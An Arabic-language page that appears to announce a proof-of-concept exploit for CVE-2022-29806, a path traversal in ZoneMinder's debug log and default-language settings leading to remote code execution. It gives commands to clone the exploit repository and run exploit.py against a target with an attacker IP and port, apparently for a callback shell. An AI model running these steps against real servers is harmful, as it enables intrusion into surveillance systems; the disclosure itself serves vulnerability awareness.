
ZoneMinder حتى الإصدار 1.36.12 تصعيد امتيازات اللغة (و RCE) - استغلال Poc
تصعيد صلاحيات اللغة في ZoneMinder حتى الإصدار 1.36.12 (وتنفيذ أوامر عن بُعد)

ثغرة Path Traversal في ملف سجل التصحيح وخيار اللغة الافتراضي في ZoneMinder قبل الإصدارين 1.36.13 و1.37.11 تتيح للمهاجمين كتابة وتنفيذ أكواد عشوائية لتحقيق تنفيذ أوامر عن بُعد.
"تم اختبار إثبات المفهوم على ZoneMinder 1.36.4 في بيئة ubuntu18.04 docker: ZoneMinder/zmdockerfiles، لكنه سيظل قابلاً للتطبيق حتى أحدث إصدار 1.36.12"
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
اكتشف krastanoel الثغرة.